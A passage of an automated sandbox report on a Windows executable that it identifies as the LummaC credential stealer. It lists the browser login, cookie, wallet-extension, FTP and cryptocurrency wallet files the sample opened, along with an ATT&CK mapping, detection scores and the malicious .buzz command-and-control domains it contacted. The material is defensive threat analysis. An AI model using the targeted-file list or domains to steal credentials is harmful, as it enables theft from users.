                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1482497732.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1482232390.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: onaUtwpiyq.exe PID: 3784, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: onaUtwpiyq.exe PID: 3784, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		851
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory44
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS1
                File and Directory Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets223
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                onaUtwpiyq.exe68%VirustotalBrowse
                onaUtwpiyq.exe61%ReversingLabsWin32.Trojan.Symmi
                onaUtwpiyq.exe100%AviraTR/Crypt.XPACK.Gen
                onaUtwpiyq.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mindhandru.buzz/CCf100%Avira URL Cloudmalware
                https://mindhandru.buzz/L100%Avira URL Cloudmalware
                https://mindhandru.buzz/CD100%Avira URL Cloudmalware
                https://mindhandru.buzz/rs100%Avira URL Cloudmalware
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.0%Avira URL Cloudsafe
                https://mindhandru.buzz/Y100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high
                  mindhandru.buzz
                  		104.21.11.101
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    scentniej.buzzfalse
                      		high
                      rebuildeso.buzzfalse
                        		high
                        appliacnesot.buzzfalse
                          		high
                          screwamusresz.buzzfalse
                            		high
                            cashfuzysao.buzzfalse
                              		high
                              inherineau.buzzfalse
                                		high
                                prisonyfork.buzzfalse
                                  		high
                                  hummskitnj.buzzfalse
                                    		high
                                    mindhandru.buzzfalse
                                      		high
                                      https://mindhandru.buzz/apifalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabonaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoonaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://mindhandru.buzz/CDonaUtwpiyq.exe, 00000000.00000003.1478996451.00000000053D4000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1478268121.00000000053D3000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1478886618.00000000053D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://mindhandru.buzz/onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559836333.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560751027.0000000000792000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ocsp.rootca1.amazontrust.com0:onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://mindhandru.buzz/pionaUtwpiyq.exe, 00000000.00000003.1524291361.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559590194.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1550821627.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bronaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://mindhandru.buzz/YonaUtwpiyq.exe, 00000000.00000003.1405319597.0000000000773000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://crl.microonaUtwpiyq.exe, 00000000.00000003.1524399042.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1506136966.0000000000791000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgonaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://x1.c.lencr.org/0onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.i.lencr.org/0onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://mindhandru.buzz/CCfonaUtwpiyq.exe, 00000000.00000003.1451952470.00000000053D2000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1452186757.00000000053D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchonaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uonaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://mindhandru.buzz/rsonaUtwpiyq.exe, 00000000.00000003.1506033237.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctaonaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgonaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYionaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://mindhandru.buzz/LonaUtwpiyq.exe, 00000000.00000003.1559590194.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://support.mozilla.org/products/firefoxgro.allonaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.11.101
                                                                                          		mindhandru.buzzUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1581242
                                                                                          Start date and time:2024-12-27 09:00:59 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 7s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:5
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:onaUtwpiyq.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:7c96eee8e62caedad10358116f0b8024.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 1
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Stop behavior analysis, all processes terminated

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target onaUtwpiyq.exe, PID 3784 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          03:01:54API Interceptor8x Sleep call for process: onaUtwpiyq.exe modified

